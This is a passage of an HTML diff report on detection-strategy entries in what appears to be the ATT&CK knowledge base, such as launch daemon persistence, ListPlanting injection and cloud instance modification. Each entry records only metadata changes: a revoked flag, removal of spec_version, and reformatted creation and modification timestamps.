black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.670000+00:00</td></tr></tbody></table></details><hr><h4>[DET0401] Detection Strategy for Launch Daemon Creation or Modification (macOS)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.695000+00:00</td></tr></tbody></table></details><hr><h4>[DET0331] Detection Strategy for ListPlanting Injection on Windows</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.670000+00:00</td></tr></tbody></table></details><hr><h4>[DET0255] Detection Strategy for Log Enumeration</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.670000+00:00</td></tr></tbody></table></details><hr><h4>[DET0244] Detection Strategy for Login Hook Persistence on macOS</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.680000+00:00</td></tr></tbody></table></details><hr><h4>[DET0101] Detection Strategy for Lua Scripting Abuse</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.691000+00:00</td></tr></tbody></table></details><hr><h4>[DET0246] Detection Strategy for MFA Interception via Input Capture and Smart Card Proxying</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.680000+00:00</td></tr></tbody></table></details><hr><h4>[DET0383] Detection Strategy for Masquerading via Account Name Similarity</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.697000+00:00</td></tr></tbody></table></details><hr><h4>[DET0443] Detection Strategy for Masquerading via Breaking Process Trees</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0226] Detection Strategy for Masquerading via File Type Modification</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.695000+00:00</td></tr></tbody></table></details><hr><h4>[DET0347] Detection Strategy for Masquerading via Legitimate Resource Name or Location</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.689000+00:00</td></tr></tbody></table></details><hr><h4>[DET0308] Detection Strategy for Modify Cloud Compute Infrastructure</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.688000+00:00</td></tr></tbody></table></details><hr><h4>[DET0449] Detection Strategy for Modify Cloud Compute Infrastructure: Create Cloud Instance</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.690000+00:00</td></tr></tbody></table></details><hr><h4>[DET0423] Detection Strategy for Modify Cloud Compute Infrastructure: Create Snapshot</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.670000+00:00</td></tr></tbody></table></details><hr><h4>[DET0084] Detection Strategy for Modify Cloud Compute Infrastructure: Delete Cloud Instance</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.693000+00:00</td></tr></tbody></table></details><hr><h4>[DET0492] Detection Strategy for Modify Cloud Compute Infrastructure: Modify Cloud Compute Configurations</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0337] Detection Strategy for Modify Cloud Compute Infrastructure: Revert Cloud Instance</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 